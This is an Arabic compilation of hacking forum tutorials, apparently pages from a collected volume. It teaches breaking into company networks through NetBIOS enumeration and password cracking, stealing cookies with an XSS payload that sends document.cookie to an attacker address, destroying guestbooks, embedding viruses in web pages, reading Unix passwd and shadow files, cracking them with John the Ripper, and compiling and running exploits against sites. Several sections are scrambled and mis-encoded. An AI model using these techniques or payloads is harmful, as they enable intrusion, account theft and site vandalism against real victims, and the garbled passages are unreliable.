‫ماراح نتكلم عن المشاركه) احس اني ازعجتكم بمواضيع المشاركه (‬
‫فيه طرق معروفه تمكنك من الدخول ولو بنسبه ‪ %50‬على اغلب السيرفرات الموجوده بالعالم لحظ ‪%50‬‬
‫اول الجهمات الولى دائمايكون الغرض منها تكوين معلومات عامه عن السيرفر الذي يراد مهاجمتته ومن‬
‫هنا نبدا الهجوم وعلى اي اساس يتركز الهجوم‬
‫احيانا يكون هجوم حرمان خدمه واحيانا هجوم اقتحام كامل حسب الموجود والمتوفر والمعلومات الموجوده‬
‫لدينا‬
‫طيب لنفرض اننا ودنا نخش على شركه معينه باسم ‪ aswind.COM‬الخطوه الولى هي التعرف على مدى‬
‫عنوان ‪ ip‬الخاصه بهذه الشركه وهذا سهل‬
‫اول شي انصح بالتسجيل في موقع ‪INTERNIC.NET‬‬
‫حتى يعطونك خدمات تستاهل‬
‫هناك طريقتين لمعرفه الي بي اول‬
‫عن طريق الموقع ‪INTERNIC.NET‬‬
‫والثانيه عن طريق برنامج الدوس بالمر ‪:‬‬
‫‪NSLOOKUP‬‬
‫‪SET TYPE = ALL‬‬
‫‪aswind.COM‬‬
‫راح تطلعلك المعلومات هذي بالضبط ‪:‬‬
‫‪Domain Name: ASWIND.COM‬‬
‫‪264‬‬

‫‪.Registrar: ONLINENIC, INC‬‬
‫‪Whois Server: whois.OnlineNIC.com‬‬
‫‪/Referral URL: http://www.onlinenic.com‬‬
‫‪Name Server: DNS.ASWIND.COM‬‬
‫‪Name Server: NS1.ASWIND.COM‬‬
‫‪Updated Date: 01-apr-2002‬‬
‫معنا الكلم هذا ان شركه ‪ aswind.com‬وضعت ارقام الملقامات الخاصه ب ‪DNS = 2‬‬
‫يعني عدد ‪ 2‬خادم ‪ DNS‬وسوت لها نشر يعني هناك على القل سيرفرين شغالين بخدمه ‪ DNS‬يعني هم‬
‫يتعتقدون ان الموضوع ماراح ياخذ كثير من طاقه التشغيل للجهزه خاصه ‪DNS‬‬
‫هنا في مجال للدخول وتعديل بيانات ‪ DNS‬بمعنى ان العمليه تصير واسعه شوي‬
‫فقط قم بنشر عنوانين من عنواوين ‪ Ip‬فقط مثل ماسوو ‪ aswind.com‬لكن لنفترض انه فيه اكثر من‬
‫عنوان لنفول ‪ 6‬مثل ‪.‬‬
‫عشان كذا اقترح على الشركات وضع عنواونين ‪ IP‬للنشر ووضع خوادم ‪ DNS‬على اجهزه قديمه وبطيئه‬
‫لنك اساسا في حاجه ل ‪ DNS‬دايناميكي وهذا يعني انك تقوم بتشغيل ‪ WIN2K‬وخدمه ‪ DNS‬على جهاز‬
‫واحد وهذي من الفكار الجيده في نظري اذا وضعت جهاز خاص فقط بال ‪DNS‬‬
‫طيب لنفرض انك مالقيت شي على اجهزه ‪ DNS‬وبما انك في بدايه هجوم هذا يعني انه عندك متسع من‬
‫الوقت اذن قم بتجريب جميع العناوين المتوفره لديك والتي حصلت عليها من ‪ HowIS‬وصدقوني فيه ادوات‬
‫موجوده بالنت مممكن انها تمسح مجموعه ‪ IP‬موجوده في شبكه معينه‬
‫طيب قم بعمل ملف اسمه ‪ LMHOSTS‬يوجود فيه اسم ‪ NetBios‬لكل عنوان ‪ IP‬استطعت انك تحصل‬
‫عليه‬
‫يعني انت عرفت ان الشبكه من كلس ‪ C‬وعنوانها ‪ 200.200.200.0‬سو لك ملف ‪ LMHOSTS‬باسم‬
‫‪ NetBios‬وملف باسم ‪ N2 = 200.200.200.2‬وهكذا بعدين تحتاج عمل ‪Net view‬‬
‫‪ //servername‬لكل اسم من ‪ N1‬إلى ‪ N254‬يعني كانك تسوي سكان بورت بس بطريقه ثانيه‬
‫من جهاز رقم ‪ 1‬إلى جهاز رقم ‪254‬‬
‫وبالنسبه للجهزه الصحيحه سوف تشتغل الخدمه فيها ام العناوين الغير متصله فلن تستجيب طبعًا‬
‫طيب انت ال الن ماتقدر تسوي شي \‬
‫بس تقدر تتاكد من حساب ‪ Administrator‬موجود وال ل او تم تغييره او اذا هناك يوزر نيم بنفس‬
‫الصلحيات انت بطبيعه الحال ماتقدر تحصل عليه بسهوله‬
‫اذن هناك ابواب خلفيه للحصول عليه من بعض الطرق الوصول لبعض اسماء المستخدمين الموجودين في‬
‫الشركه وهذا يعتبر عيب من عيون ‪ Windwos‬لنها تطنشهم ههههههههه مدري ليش‬
‫فيه امر تقدر تعرف من خلله بس أل الن انت ماتقدر تسويه لنه مالك حق وصول مباشر يعني انت لزم‬
‫تحصل على ‪ username and password‬لي يوزر موجود في المجال المر هو ‪ net user‬وهو‬
‫يستعرضلك جميع المستخدمين الموجودين بالمجال‬
‫لكن فيه طريقه للحصول على اسماء بالهبل ههههههه‬
‫كيف ؟؟‬
‫الن عندما يقوم مستخدم بتسجيل دخول يقوم جهازه ليس فقط بتسجيل اسمه فقط بل اسم جهازه يعني على‬
‫سبيل المثال مدير الشبكه اذا صار عنده زحمه يشغل خدمه اسمها مراقبه النظام حتى يعرف انه وصل للحد‬
‫القصى‬
‫عندما يقوم مستخدم بتسجيل الدخول تقوم خدمه ‪ Messenger Service‬بتسجيل اسم المستخدم كاحد‬
‫اسماء ‪ NetBios‬الموجودين في الشبكه الي انت اساسا جالس تبحث عنهم وعلى افتراض انك دخلت على‬
‫خادم بعنوان ‪ IP 200.200.200.200‬فأن اي شخص اذا قام بعمل ‪nbtstat -a 200.200.200.200‬‬
‫سيتكمن من معرفه اسم جهازك واسم المستخدم واذا كان جهازك ‪ MSBROWSER‬او ل ) سوف اتحدث‬
‫عنها بالتفصيل (‬
‫طيب لنفرض ان فيه شخص باسم ‪ John‬ورقم ‪IP 200.200.200.50‬موجود في الشبكه فانك اذا قمت‬
‫بعمل ‪ Nbtstat -a 200.200.200.50‬راح يضهرلك انه فيه شخص باسم ‪ john‬واسم جهازه‬

‫‪265‬‬

‫‪johnPC‬‬
‫الن موجود معك اسم مستخدم ) احتمال يكون ‪( Administrator‬طيب وش نسوي‬
‫؟‬
‫قوم بتعطيل خدمه ‪ Messenger Service‬في جهزك ) ولن يتم تسجيل اسمك في النطاق يعني بتخش‬
‫مخفي (‬
‫وبالسنبه ل ‪ MSBROWSER‬اذا شفتها بعد عمل المر ‪nbtstat -a‬‬
‫هذا يعني انه استعراض رئيسي للمجال وهذا من اكبر الخطاء التي يقومون بها مدراء الشبكات لن مراقب‬
‫المجال يدوخ ل يستطيع التجميع وتستطيع استغلل مثل هذه الثغرات دائما في الشبكات الداخليه‬
‫طيب انت الن حصلت على اسم المتسخدم‬
‫انت محتاج كلمه المرور وهذي هي المشكله يعني انت ضميت جهازك مع الشبكه لكن ماقدرت تحصل على‬
‫كلمه المرور لكن تقدر تحصل عليها ‪ nt senstiver‬او متحسس الشبكه ) معليش ماني متاكد من السبيلنق‬
‫(‪.‬‬
‫طيب كيف اقدر احصل فعليا على كلمه المرور‬
‫غالبا ماتكون كلمات مرور المستخدمين تاففه جدا هاذ اذا وجدت اصل‬
‫يعني برنامج مثل ‪ l0pthcrack‬يحل لك المشكله‪.‬‬
‫انتهى‪،،،‬‬

‫‪266‬‬

‫" ‪" Cross Site Scripting‬‬
‫>منقول من منتدى الحلم<‬
‫>الكاتب‪<tcp :‬‬
‫المتطلبات ‪:‬‬
‫معرفة تامه بلغة ‪HTML‬‬
‫اطلع غير متعمق على لغات السكربتينق وهي ‪JAVASCRIPT ,PERL ,CGI ,VBSCRIPT‬‬
‫ومن وجهة نظر شخصية المصايب كلها من الجافا سكربت والهتمل‬
‫===========================================================‬
‫====================================‬
‫الهداف المنشوده ‪:‬‬
‫* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم‬
‫* اختراق المنتديات من نوع ‪ VBULLETIN‬او ‪ YaBB and UBB‬او المجلت من البهب نيوك او‬
‫بوست نيوك‬
‫*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين‬
‫* ان يستطيع القارئ توسيع مداخل الختراق‬
‫===========================================================‬
‫=====================================‬
‫جمله عرضية ‪:‬‬
‫الختراق ليس ال تشغيل للمخ واستغلل لشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود‬
‫على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او‬
‫‪267‬‬

‫المواقع التي تطرح الثغرات المنية ‪...‬هل نحتاج الى امة تطور نفسها ‪ ..‬ام نطور انفسنا نحو المية‬
‫===========================================================‬
‫=====================================‬
‫المشكلة ‪:‬‬
‫كما هو معروف فان مستعرضات الوب مثل الكسبلورر او نت سكيب ‪ ...‬الخ تاتي مترجمات النصوص او‬
‫السكربتات‬
‫مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين‬
‫فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه ‪.‬‬
‫اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية‬
‫او قد تستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين‬
‫المثال التالي يوضح كيفية ادراج السكربت ‪:‬‬
‫‪.Hello FOLKS board. This is a message‬‬
‫>‪<SCRIPT>malicious code</SCRIPT‬‬
‫‪.This is the end of my message‬‬
‫ان كلمة ‪ malicious code‬تم ادرجها او حقنها في بين علمتي السكربت وقد تحتوي على كود خبيث‬
‫يسرق او يرسل بيانات ‪ ...‬الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها ال اذا مكنها الدمن‬
‫او المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل ‪ HTML‬مثل يتم ادراج السكربت مكان خاصية المج‬
‫>‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬
‫او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق‬
‫المسنجر‬
‫والمثال التالي يوضح لك كيفية عمل رابط في صفحة‬
‫>?‪A HREF="http://example.com/comment.cgi‬‬
‫‪<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A‬‬
‫انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعله وتضغط عليه سينفذ‬
‫السكربت‬
‫وللشرح اكثر لنفرض ان السكربت ‪ comment.cgi‬سكربت يرسل ملحظاتك لصاحب الموقع او قد يكون‬
‫سكربت للبحث‬

‫‪268‬‬

cert.com/pub/a/2002/02/20/css. <OBJECT>.‫في الموقع او المنتدى وهو يحتوي على متغير داخله اسمه ‪ mycomment‬ياخذ المدخلت او الملحظات‬ ‫التي تكتبها‬ ‫فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان‬ ‫ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لحظ الفكره هنا فقد ضمن السكربت داخل‬ ‫حقل نصي فبدل من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت ‪. <APPLET>.html‬‬ ‫‪http://www.org/advisories/CA-2000-02.html‬‬ ‫‪269‬‬ . and <EMBED‬‬ ‫ومن الممكن ان يكون هناك وسم النماذج >‪ <form‬من وسوم ‪ HTML‬وبنفس الفكار السابقة يمكن تنفيذ‬ ‫الوامر‬ ‫منها لسرقة الكوكيز او بيانات اخرى او توجيهك لصفحات اخرى‬ ‫اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع الن ان تفهم ما اقصده‬ ‫=========================================================‬ ‫ولمزيد من التفاصيل ‪:‬‬ ‫‪http://www.cgi? mycomment=<SCRIPT‬‬ ‫‪<SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A‬‬ ‫هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخر‬ ‫والذي‬ ‫هو بالسم ‪ BADFILE‬ولن مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأن‬ ‫هذا الهجوم‬ ‫يسمى ب ‪ cross-site scripting‬او الترجمه من عندي " برمجة عبور الموقع " لننا عبرنا باستخدام‬ ‫برمجة‬ ‫السكربتات اكثر من موقع واذا كنت تلحظ في السيكيورتي فوكس او المواقع المنيه تختصر ب ‪ CSS‬وهي‬ ‫اختصار‬ ‫ل ‪ cross-site scripting‬وليس ل ‪ CASCADE style sheets‬اي اوراق النماط المتتالية‬ ‫قد يدخل بدل الوسم او علمة السكربت اي من الوسوم التالية‬ ‫>‪<SCRIPT>.‬‬ ‫وحتى اعقد المور اكثر‬ ‫لحظ المثال التالي ‪:‬‬ ‫>‪A HREF="http://example.perl.com/comment.

‫انتهى‪،،،‬‬ ‫" كود تدمير سجل الزوار "‬ ‫>ةةةةة ةة ةةةةةةة ةةةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةةة<‬ ‫كود صغير جدا بحجمه‪.‬‬ ‫‪.‬‬ ‫‪.‬نقف ونكتب‪:‬‬ ‫‪...‬‬ ‫هذا هو الكود ‪:‬‬ ‫==================================================‬ ‫=‬ ‫‪--><h3>put your text here<xmp><plaintext‬‬ ‫==================================================‬ ‫‪270‬‬ ..‬‬ ‫‪.‬‬ ‫‪.‬السم‪ -‬اليميل‪ -‬موقعك الشخصي‪-‬تقديرك للموقع‪ -‬طريقة الستدلل‪.‬‬ ‫‪...‬‬ ‫‪.‬‬ ‫‪.‬‬ ‫‪...‬والنقطه المهمه وهي‬ ‫كتابة تعليقك على الموقع؟؟؟؟؟؟؟‬ ‫نحن سوف نضع كل شي حسب ما هو مطلوب ولكن عندما نأتي لكتابة التعليق‪.....‬‬ ‫‪.‬‬ ‫‪.‬‬ ‫‪.....‬‬ ‫‪..‬كبير بقدرته على تدمير سجل الزوار بالكامل‪.‬انتم تعرفون طبعا كيفية عمل توقيع في‬ ‫سجل الزوار‪..

.‬هاتلقي تحت ثلث مربعات الول عادي والثاني ‪ html‬والثالث معاينة‬ ‫انت خليك في العادي‬ ‫اختار ادراج‬ ‫ثم اختار مكون ويب‪ ..‬هايطلعلك جدول صغير من خانتين ‪ .....‬انت عليك تحط في المربع‬ ‫ده كود الفيرس وتضغط موافق ‪ (:‬وكده الطبخة استوت ‪.‬‬ ‫واوعى تضغط على معاينة الصفة وانت معندكش نورتن لكن لو عندك هايديك تحذير بوجود فيروس‬ ‫الطريقه للي عنده فرونت بيج عربي واللي عنده انجليزي هي نفس الخطوات مع تغيير السامي‪.‬بعد توقيعك اعمل‬ ‫ريفريش وانظر ماذا حصل‬ ‫ملحظه‪:‬‬ ‫=====‬ ‫الكود ل يعمل مع بعض انواع سجل الزوار؟!‬ ‫انتهى‪،،،‬‬ ‫" وضع فايروس في صفحة "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<Dr^FunnY :‬‬ ‫اختار صفحة جديدة ‪ ... "HTML‬هايفتحلك مربع تاني‪ .‬خليك في الخانة الولى اللي على اليمين‬ ‫واختار منها ااخر اختيار اللي هو "عناصر تحكم متقدمة" اضغط ضغطه واحده وهايظهرلك عناصر في الخانه‬ ‫اللي على اليسار اختار اول اختيار اللي هو "‪ ... put your text here‬وهذا كل شي ‪...‫يمكنك كتابة اي شي تريد في مكان ‪....‬‬ ‫انتهى‪،،،‬‬ ‫‪271‬‬ ....

net‬‬ ‫واكتب الموقع ثم إنتر‪ !.ukrt.‬‬ ‫لمعرفة نظام التشغيل إذهب إلى الموقع‬ ‫‪www..com‬‬ ‫‪www..‬وستعرف بعض المعلومات عن الموقع كليبي ونظام التشغيل‪.securityfocus.securify.!!...‬يمكن استخدامها في لينوكس فقط‬ ‫ثغرات بلغة شل‬ ‫*‪sh.com‬‬ ‫والنواع الباقية أو الستثمارات ‪:‬‬ ‫ثغرات مكتوبة بلغة بيرل *‪pl....netcraft.‬إلخ‬ ‫‪ -3‬معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك‬ ‫‪ -4‬معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي‬ ‫أنواع الثغرات‬ ‫أبسط النواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل‬ ‫‪/..‬إلخ‬ ‫أول يجب أن تجمع كل المعلومات الممكنة حول الموقع ‪:‬‬ ‫‪ -1‬المنافذ المفتوحة مثل الف تي بي والتلنت مثل وهذ عن طريق برامج مثل‬ ‫‪super scan‬‬ ‫ابحث عنه في النترنت‪./www.com‬‬ ‫‪www..com‬‬ ‫‪www.‬ويمكن استثمارها في لينوكس فقط‬ ‫ويمكنك إيجاد الكثير من النواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها‬ ‫‪www.ussrback.packetstorm.thesite.‬‬ ‫ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج‬ ‫‪Active Perl‬‬ ‫ثغرات بلغة سي‬ ‫*‪ c.‫" الثغرااات "‬ ‫>ةةةةة ةة ةةةة ةةةةةة<‬ ‫‪ = Exploit‬اسثمار = ثغرة‬ ‫الجزء المهم‪:‬‬ ‫الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغللها للحصول على ملف الباسوورد وقاعدة‬ ‫البيانات وووو‪.com‬‬ ‫‪www.com‬‬ ‫‪272‬‬ .f2s.‬‬ ‫‪ -2‬معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به‬ ‫واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لخر‪.securiteam.

.rootshell.passwd or /etc/shadow‬والجديد هو ‪x‬‬ ‫‪token‬‬ ‫‪IRIX : /etc/shadow‬‬ ‫‪token = x‬‬ ‫‪! = AIX : /etc/security/passwd‬‬ ‫‪token‬‬ ‫‪* = ConvexOS : /etc/shadow or /etc/shadpw‬‬ ‫‪token‬‬ ‫مثال لملف شادو‬ ‫‪::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪::::::lp:NP:6445‬‬ ‫نجد أن كلمة السر هي‬ ‫‪EpGw4GekZ1B9U‬‬ ‫كيف تفك التشفير؟‬ ‫عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات‬ ‫‪John the ripper‬‬ ‫وهو يقوم بتجريب كل المحاولت الممكنة حتى يحصل على الباسوورد ‪.com‬‬ ‫أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج‪.‬‬ ‫أما المشفرة والتي سنحصل عليها تكون هكذا‪:‬‬ ‫مضللة ‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫مشفرة ‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬ ‫‪ = root‬أو الجذر اسم المستخدم‬ ‫‪ = x‬كلمةالسر ولكنها مضللة‬ ‫وباقي السطر غير مهم‬ ‫في الغلب ستكون كلمة السر مضللة ‪ shadowed‬لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر‬ ‫مشفرة يسمى ملف الشادو‬ ‫‪shadow file‬‬ ‫ويوجد في أماكن معينة تختلف باختلف نظام التشغيل‬ ‫‪ = token‬الرمز الذي يعبر عن الباسوورد‬ ‫‪* = Linux : /etc/shadow‬‬ ‫‪token‬‬ ‫‪ = SunOS : /etc/shadow‬يأخذ أشكال متعدده اشهرها هو *‬ ‫‪token‬‬ ‫‪ * = FreeBSD : /etc/master.com‬‬ ‫‪www..‬المشكلة أن كلمةالسر تكون بداخله مضللة ‪shadowed‬‬ ‫أو مشفرة ‪.‬‬ ‫ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثل وعليك وضع الكلمة المشفرة بدل من ال ‪ x‬وعليك‬ ‫ترتيبها بحيث يكون كل حساب في سطر‬ ‫طريقة تشغيله‪:‬‬ ‫إذهب إلى الدوس واكتب‬ ‫‪john passwd‬‬ ‫حيث ‪ passwd‬هو الملف الذي به الباسوورد المشفرة وضعتها‬ ‫‪273‬‬ ..‬‬ ‫كلمات السر السابقة مضللة وهي علمة ‪x‬وقد تختلف‪.‫‪www.‬‬ ‫ويمكنك من خلل البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن‬ ‫ثغرات لها في مواقع الثغرات أو المواقع السابقة‪.encryption‬‬ ‫مثال لملف باسوورد‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫ولن ملف الباسوورد يحتوي على كلمات سر الشخاص المرخص لهم بدخول الموقع قد ل بزيد عن عشرة‬ ‫أسطر وقد يصل آلف السطر‪.‬وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك‬ ‫بحث أو حتى عداد زوار‬ ‫حسنا لنفرض أنك حصلت على ملف الباسوورد‪..secureroot.

.‬‬ ‫‪ 4‬مواقع مفيده للبحث عل الثغرات ‪...‬فانه يوجد طريقتين لمعرفه ما اذا كانت الثغره موجوده ام ل‪....‬‬ ‫لذلك نستخدم ‪ scanner‬لبحث عن هذا الستثمار ‪..‬بالنسبه لموضوع البوفر اوفر فلو فهو يشبه الى حد كبير‬ ‫ال ‪ DoS‬حيث يعتمد على ارباك السيرفير بفيض من المعلومات و يمنحك الرووت ‪..‬‬ ‫اما هجوم ال ‪ DoS‬فهو عباره عن ارسال ‪ GET / POST‬ال السيرفير مما يؤدي ال‬ ‫حدوث ‪ OVERLOAD‬لوحده المعالجه المركزيه للسيرفير )اللي هو عباره عن جهاز يعمل‬ ‫‪ 24‬ساعه ( فيتوقف الموقع عن العمل و يصبح السيرفير ‪..‬‬ ‫‪274‬‬ ..pot‬‬ ‫وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه ‪.‬‬ ‫اما عن طريق التطبيق مباشره من خلل المتصفح كما في حاله بعض ثغرات امتصفح مثل اليونيكود او‬ ‫الفرونت بيج‬ ‫او ان تستخدم السكانرز في فحص الموقع ‪.‬‬ ‫و يوجد ايضا الثغرات التي تتيح لك تنفيذ بعض الوامر مثل عرض و مسح و الكتايه على الملفات‬ ‫مث الكستينشنز و غيرها ‪.John the Ripper Version 1... (BOF (buffer over flow) .‬يو جد العديد من الستثمارات مثل‬ ‫‪.......‬طبعا من المعروف ان ثغرات المتصفح لها سكانرز ال‬ ‫‪threads‬‬ ‫و هي تسمى ال ‪ cgi scaners‬بعضها ممكن ان تضيف له ملفات بها ثغرات و البعض الخر يكون‬ ‫جاهزا ‪.‬الستثمارات دايما ما توجد‬ ‫بواسطه ملف معين يجعك تستطيع الدخول بواسطه ال ‪ http‬بصوره طبيعبه ‪.‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××‬ ‫‪: a face at the interface‬‬ ‫الستثمارات تستخدم عاده لكي تحصل عل الرووت عل نظام معين ‪...‫سيظهر ‪:‬‬ ‫‪by Sola 97.‬‬ ‫انتهى‪،،،‬‬ ‫" شرح شبه مفصل عن الثغرات "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< icer :‬‬ ‫الموضوع اليوم ينقسم الى التالي ‪:‬‬ ‫‪ 1‬كيف تجد اكسبلويتات ؟‬ ‫‪2‬كيف تستعمل الكسبلويتات ) دعونا نسميها استثمارات ( ؟‬ ‫‪ 3‬انواع مختلفه من الستثمارات ‪. OFFLINE‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××‬ ‫‪ 1‬كيف تجد استثمارات ؟‬ ‫لكي تستطيع ان تستثمر ثغره معينه في سيرفير فانه يجب عليك اول ان تتاكد ان الثغره موجوده في السيرفير‬ ‫و لما كان الستثمار عباره عن فايل معين ‪.3 Copyright (c) 1996‬‬ ‫‪Loaded 1 password‬‬ ‫**‪v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫وإذا أردت معرفة الباسوورد التي يخمنها الن اضغط انتر‬ ‫والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه‬ ‫‪john.... DoS ( denial of service‬‬ ‫و على فكره انا ا اؤمن ان ال هجوم ال ‪ DoS‬هي اكسبلويت ‪.‬و الرووت هو عباره‬ ‫عن الدمينيستراتور او مدير النظام الذي تريد اختراقه ‪.

.com /www.‬‬ ‫او قد تعطي لك الكلمه السريه و اسم اليوزر اما في صوره واضحه مثل الملف ‪ config..‬‬ ‫‪.‬تزرو العنوان ده و تقره كل كلمه تلقيها هناك ‪.(:‬‬ ‫انتهى‪،،،‬‬ ‫‪275‬‬ ..rootshell...insecure.com‬و غيرها ابحث سوف تجد المزيد ‪...com‬و هو‬ ‫يحتوي على‬ ‫محرك بحث يكفي ان تضع مفتاح للبحث عباره عن كلمه واحده او كلمتان مثل ‪ red hat 7.‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××××××‬ ‫‪ 3‬انواع مختلفه من الستثمارات ‪:‬‬ ‫طبعا الكثير من الستثمارات يكون هدفها هو منحك الرووت على السيرفير ‪.‬‬ ‫و كيف تستخدمها و اشياء زي كده ‪...‫و هناك نوع اخر من السكانرز و ان احبذه ‪<<< shadow security scaner.‬ل‬ ‫يعرفون ايش يسوون‬ ‫بعد كذا؟؟؟؟‪.. DES/MD5‬كما في الملف ‪ ...2‬و سوف تجد‬ ‫العديد من الثغرات التي تحتوي على‬ ‫‪..com‬‬ ‫و تكتب في محرك البحث اسم الثغره و انت ان شاء ال في ‪ %99‬من الحالت بتلقي استثمار لهاي الثغره‪.inc‬او مشفره‬ ‫بمقياس‬ ‫‪ ........‬‬ ‫كها تعتمد على طريقه عمل الثغرات ‪ ..org‬‬ ‫‪ /www.‬‬ ‫او اذا لم تجد اي ‪ url‬في السكانرز الخرى يبقى تاخد اسم اثغره و تروح الموقع ‪rootshell..‬على فكره من احسن المواقع التي يمكن ان تجد بها احدث الثغرات هو ‪ rootshell. red hat 7....‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××××××‬ ‫‪ 4‬مواقع مفيده للبحث عن الثغرات من خللها ‪:‬‬ ‫يمكنك البحث عن الستثمارات الجديده في هذه المواقع ‪:‬‬ ‫‪packetstorm..‬اي لك كل الصلحيات على‬ ‫السيرفير‬ ‫و الحصول على الرووت يمكن ان يتم من خلل العديد من الثغرات مثل ثغرات ال ‪ ..‬معنى كلمه رووت هو المدير‬ ‫او الدمين ‪ ......com /..‬‬ ‫لو انت بتستعمل الشادو حتلقي ‪ url‬بجانب الثغره ‪.‬فهي قد تعطي لك صلحيه قراءه و حذف و الكتابه عل الملفات و ايضا‬ ‫رفع ملفات الى السيرفير ‪..‬و هذا بسبب استقبال السيرفير لكم هائل من الداتا فيؤدي الى ارباك السيرفير ‪..securityfocus.‬‬ ‫بالنسبه للبفر اوفر فلو فهو يشبه الى حد كبير هجوم ال ‪ DoS‬و لكنه ل يسبب ضرر للسيرفير مثلما يسببه‬ ‫هجوم ال ‪ DoS‬المهم انه في اغلب الحيان يكون البفر عباره عن ارسال اوامر للسيرفير تنتهي دائما‬ ‫باعطائك‬ ‫صلحيه الرووت ‪ ..securify..‬ل يوجد اي قيود على ال ‪ commands‬اللي الرووت يكتبها ‪....2‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫××××××××××××××××××××××××××××××××××‬ ‫‪ 2‬كيف تستغل هذه الثغرات ؟؟‬ ‫الكثير من الناس عندما يفحصون موقع بسكانر )و خاصه ال ‪ ( shadow‬و يطلع لهم استثمارات معينه ‪. http‬و ال ‪ BOF‬و‬ ‫غيرها ‪.. etc/passwd/‬في انظمه اليونيكس ‪.

xxx/.xxx.‬‬ ‫‪c..gcc filenmae...xxx‬‬ ‫او‬ ‫‪filename xxx...‬من الممكن اي يحتوي على سورس كود لبعض الثغرات او البرامج المكتوبة بالسي‬ ‫‪ .‬هذا يفترض عليك‬ ‫عليك تحميله ثم عمل )‪_ (compile‬وهذا يعني تحويل السورس كود لملف )برنامج(_ ثم تثوم‬ ‫بتشغيله‪.out‬وهو البرنامج الناتج‪.‬اكمل القراءة لتعرف كيفية استخدامها‪.a..xxx.‬واغلب الثغرات يتم كتابتها بالسي‪.xxx.‬لتشغيله ايضا تحتاج ‪ Linux‬او ‪Shell Account‬‬ ‫اذا كان ‪ exploit‬واردت ان تطبقه على موقع اكتب‪:‬‬ ‫‪perl filename. :‬‬ ‫ويعني ملف ملف نصي‪. :‬‬ ‫برنامج بيرل‪.‬‬ ‫‪276‬‬ ..c‬امر الكومبايل‬ ‫سينتج الملف‪:‬‬ ‫‪ >--.xxx.‬فيجب ان يكون عندك ‪ Linux‬او‬ ‫‪.‫" كيف تستخدم الثغرات "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<oOoDa BE$T :‬‬ ‫البداية‪:‬‬ ‫‪txt.xxx/...‬‬ ‫كمثال‪:‬‬ ‫‪a.xxx..‬‬ ‫للثغرات المكتوبة بالبيرل‪:‬‬ ‫‪pl.. Shell Account‬‬ ‫بعض التحميل توجه للمسار الموجود به المفل ثم اكتب‪:‬‬ ‫‪ >---.out xxx.‬البير‪.xxx.‬‬ ‫والن ماذا ينقصك؟؟‬ ‫يجب ان يكون معك اي بي او اسم 